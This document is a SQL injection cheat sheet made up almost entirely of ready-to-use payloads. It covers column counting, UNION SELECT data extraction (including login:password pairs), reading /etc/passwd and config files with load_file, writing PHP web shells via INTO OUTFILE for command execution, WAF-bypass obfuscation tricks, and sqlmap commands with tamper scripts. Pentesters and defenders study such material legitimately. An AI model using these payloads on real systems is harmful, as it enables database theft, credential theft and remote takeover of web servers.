📀Union Cheatsheet

Default table in Databases

-----------|--------------------------------------------------------     
SQLite:    |    sqlite_master   
-----------|--------------------------------------------------------
MySQL      |    information_schema
-----------|--------------------------------------------------------
MSSQL      |    information_schema
-----------|--------------------------------------------------------
Oracle:    |         dual
-----------|--------------------------------------------------------

Detect the number of vulnerable columns

 ORDER BY 1-- -
 ORDER BY 2-- - 
 ORDER BY 3-- -
 ORDER BY 4-- -
 ORDER BY 5-- -
 ORDER BY 6-- -
 ORDER BY 7-- -
 ORDER BY 8-- -
 ORDER BY 9-- -
 ORDER BY 10-- -
 
 ORDER BY 1# 
 ORDER BY 2# 
 ORDER BY 3# 
 ORDER BY 4# 
 ORDER BY 5# 
 ORDER BY 6# 
 ORDER BY 7# 
 ORDER BY 8# 
 ORDER BY 9# 
 ORDER BY 10# 

Union Select Payloads

 UNION SELECT 1
 UNION SELECT 1,2
 UNION SELECT 1,2,3
 UNION SELECT 1,2,3,4
 UNION SELECT 1,2,3,4,5
 UNION SELECT 1,2,3,4,5,6
 UNION SELECT 1,2,3,4,5,6,7
 
 1' UNION SELECT 1-- -
 1' UNION SELECT 1,2-- -
 1' UNION SELECT 1,2,3-- -
 1' UNION SELECT 1,2,3,4-- -
 1' UNION SELECT 1,2,3,4,5-- -
 1' UNION SELECT 1,2,3,4,5,6-- -
 1' UNION SELECT 1,2,3,4,5,6,7-- -
 
 ' UNION SELECT NULL-- -
 ' UNION SELECT NULL,NULL-- -
 ' UNION SELECT NULL,NULL,NULL-- -
 ' UNION SELECT NULL,NULL,NULL,NULL-- -
 ' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
 ' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
 ' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
 

 UNION ALL SELECT 1
 UNION ALL SELECT 1,2
 UNION ALL SELECT 1,2,3
 UNION ALL SELECT 1,2,3,4
 UNION ALL SELECT 1,2,3,4,5
 UNION ALL SELECT 1,2,3,4,5,6
 UNION ALL SELECT 1,2,3,4,5,6,7
 
 UNION(SELECT 1)
 UNION(SELECT 1,2)
 UNION(SELECT 1,2,3)
 UNION(SELECT 1,2,3,4)
 UNION(SELECT 1,2,3,4,5)
 UNION(SELECT 1,2,3,4,5,6)
 UNION(SELECT 1,2,3,4,5,6,7)
 
 UNION ALL(SELECT 1)
 UNION ALL(SELECT 1,2)
 UNION ALL(SELECT 1,2,3)
 UNION ALL(SELECT 1,2,3,4)
 UNION ALL(SELECT 1,2,3,4,5)
 UNION ALL(SELECT 1,2,3,4,5,6)
 UNION ALL(SELECT 1,2,3,4,5,6,7)
 
 AND 1 UNION SELECT 1
 AND 1 UNION SELECT 1,2
 AND 1 UNION SELECT 1,2,3
 AND 1 UNION SELECT 1,2,3,4
 AND 1 UNION SELECT 1,2,3,4,5
 AND 1 UNION SELECT 1,2,3,4,5,6
 AND 1 UNION SELECT 1,2,3,4,5,6,7

String Concatenation & Comments

--------------|--------------------|-----------|-------------------- 
              | MySQL              | MySQL     | PostgreSQL 
--------------|--------------------|-----------|--------------------
String Concat:| 'foo' 'bar'        |'foo'+'bar'| 'foo'||'bar'  
              | CONCAT('foo','bar')|           |               
--------------|--------------------|-----------|-------------------
Comments:     | #                  | --        |  --           
              | --                 | /*aaa*/   | /*aaa*/       
              | -- -               |           |               
              | /*aaa*/            |           |               
--------------|--------------------|-----------|--------------------

              | Oracle
--------------|-----------------------------------------------------      
String Concat:| 'foo'||'bar
              | CONCAT('foo','bar')       
--------------|-----------------------------------------------------
Comments:     | --
              |
--------------|-----------------------------------------------------

----------------------------------------------------------------

Manual Exploitation

-----------|--------------------------------------------------------     
Detection: | aa' --
           | aa' #
           | aa'/*
           | ' or 1=1--
           | ' or 1=1#
           | ' or 1=1/*
           | ') or '1'='1--
           | ') or ('1'='1--
-----------|--------------------------------------------------------
Number     | ?id=1 order by <number> #
of columns:| (Keep increasing number until you get an error, 
           | the last number that doesn’t give you an error
           | is the # of columns)
-----------|--------------------------------------------------------
Version:   | ?id=1 union select 1,version(),3,4 #
           | id=1 UNION SELECT null,@@version,null,null
           | id=3 and substring(@@version,1,1)=4
           | id=3 and substring(@@version,1,1)=5
           | id=3 union all select 1,2,@@version,4/*
-----------|--------------------------------------------------------
Current    | ?id=1 union select 1,2,user(),4 #
users:     | SELECT user(); **(Mysql)**
           | SELECT system_user(); **(Mysql, MSSQL)**
           | SELECT user_name(); **(MSSQL)**
           | SELECT user; **(MSSQL, PostgreSQL)**
           | SELECT current_user; **(PostgreSQL)**
           | SELECT user FROM dual **(Oracle)**
           | ') or ('1'='1--
-----------|--------------------------------------------------------
Tables:    | ?id=2 union select 1,table_name,3,4 
           | from information_schema.tables
           | SELECT * FROM information_schema.tables **(MySQL)**
           | SELECT * FROM information_schema.tables **(MSSQL)**
           | SELECT * FROM information_schema.tables **(PostgreSQL)**
           | SELECT * FROM all_tables **(Oracle)**
-----------|--------------------------------------------------------
Columns:   | ?id=2 union select 1,column_name,3,4 from 
           | information_schema.columns where table_name='users'
           | SELECT * FROM information_schema.columns
           | WHERE table_name = 'table-name' **(MySQL)**
           | SELECT * FROM information_schema.columns
           | WHERE table_name = 'table-name' **(MSSQL)** 
           | SELECT * FROM information_schema.columns
           | WHERE table_name = 'table-name' **(PostgreSQL)**
           | SELECT * FROM all_tab_columns
           | WHERE table_name = 'table-name' **(Oracle)**
-----------|--------------------------------------------------------
Time-Based:| SELECT sleep(10) **(MySQL)
           | WAITFOR DELAY ‘0:0:10’ **(MSSQL)
           | SELECT pg_sleep(10) **(PostgreSQL)
           | dbms_pipe.receive_message((‘a’),10) **(Oracle)
-----------|--------------------------------------------------------
Blind      | ?id=3
Injection: | ?id=3 and 1=1 **(no error)
           | ?id=3 and 1=2 **(error)
-----------|--------------------------------------------------------
Extracting | cat.php?id=2 union select
Data:      | 1,**concat(**login,0x3a,password**)**,3,4 from users
--------------------------------------------------------------------
Reading files:

‘ union select 1,2,3, load_file(‘/etc/passwd’) ,5,6,7,8 — -

‘ union select 1,2,3, load_file(‘/var/www/login.php’) ,5,6,7,8 — -

‘ union select 1,2,3, load_file(‘/var/www/includes/config.inc.php’) ,5,6,7,8 — -

‘ union select 1,2,3, load_file(‘/var/www/mysqli_connect.php’) ,5,6,7,8 — -

--------------------------------------------------------------------

Uploading files:

‘ union select 1,2,3, ‘this is a test message’ ,5,6,7,8 into outfile ‘/var/www/test’ — -

‘ union select 1,2,3, load_file(‘/var/www/test’) ,5,6,7,8 — -

‘ union select null,null,null, “<?php system($_GET[‘cmd’]) ?>” ,5,6,7,8 into outfile ‘/var/www/shell.php’ — -

‘ union select null,null,null, load_file(‘/var/www/shell.php’) ,5,6,7,8 — -

--------------------------------------------------------------------

Command Execution:

# windows
?id=1 union all select 1,2,3,4,”<?php echo shell_exec($_GET[‘cmd’]);?>”,6,7,8,9 into OUTFILE ‘c:/xampp/htdocs/cmd.php’

# linux
?id=1 union all select 1,2,3,4,”<?php echo shell_exec($_GET[‘cmd’]);?>”,6,7,8,9 into OUTFILE ‘/var/www/html/cmd.php’

-------------------------------------------------------------------

----------------------------------------------------------------

WAF Bypass

-----------|--------------------------------------------------------      
Replacing  | **/**/
           | /**/
Space:     | + 
           | /*! */
           | /*!50000 */
           | /*!1234 */
           | /*--*/
           | --%0A 
-----------|--------------------------------------------------------
Bypass     | uNiOn (change upper-lower case)
filters for| unUNIONion (write words in the keyword)
keywords:  | %55nIoN %53eLeCt (URL encode letters - U & S in these       
           | cases)
           | Add followings around the words 
           | **/*!50000**XXXXXX***/** /*!50000UniON SeLeCt*/
           | %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
-----------|--------------------------------------------------------
Version:   | ?id=1 union select 1,version(),3,4 #
           | id=1 UNION SELECT null,@@version,null,null
           | id=3 and substring(@@version,1,1)=4
           | id=3 and substring(@@version,1,1)=5
           | id=3 union all select 1,2,@@version,4/*
-----------|-------------------------------------------------------- 
# of       | **/**/**ORDER**/**/**BY**/**/**
columns:   | **/*!**order***/+/***!by***/
(By order) | **/*!**ORDER BY***/**
           | **/*!50000**ORDER BY***/
           | /*!50000**ORDER***//**//*!50000**BY***/
           |  /*!12345**ORDER***/+/*!**BY***/**
--------------------------------------------------------------------

SQLMAP - Use Tamper Scripts to Bypass WAF:

sqlmap -r login.req --dbms=mysql  --level 3 --risk 3 --timeout 100 --flush-session --technique=B --time-sec=2 --dbs --threads 10 --tamper=between,informationschemacomment,bluecoat,charencode --drop-set-cookie --fresh-queries --binary-fields -identify-waf

-------------------------------------------------------------------
SQLMAP - Tamper Scripts:

tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

-------------------------------------------------------------------
SQLMAP - MSSQL Tamper Scripts:

tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

-------------------------------------------------------------------
SQLMAP - MYSQL Tamper Scripts:

tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

--------------------------------------------------------------------

----------------------------------------------------------------

UNION Attack, Querying the database type and version

Database type	           Query

Microsoft, MySQL	SELECT @@version
Oracle	                SELECT * FROM v$version
PostgreSQL	        SELECT version()
sqlite                  SELECT sqlite_version()

For example, you could use a UNION attack with the following input:

?category=Gifts' UNION SELECT 1,@@version--

-------------------------------------------------------------

Database-specific syntax On Oracle, every SELECT query must use the FROM keyword and specify a valid table.

There is a built-in table on Oracle called dual which can be used for this purpose. So the injected queries on Oracle would need to look like:

' UNION SELECT NULL FROM DUAL--

-------------------------------------------------------------

Finding columns with a useful data type

After you determine the number of required columns, you can probe each column to test whether it can hold string data. You can submit a series of UNION SELECT payloads that place a string value into each column in turn. For example, if the query returns four columns, you would submit:

' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--

If the column data type is not compatible with string data, the injected query will cause a database error, such as:

//Conversion failed when converting the varchar value 'a' to data type int.

If an error does not occur, and the application's response contains some additional content including the injected string value, then the relevant column is suitable for retrieving string data.

-------------------------------------------------------------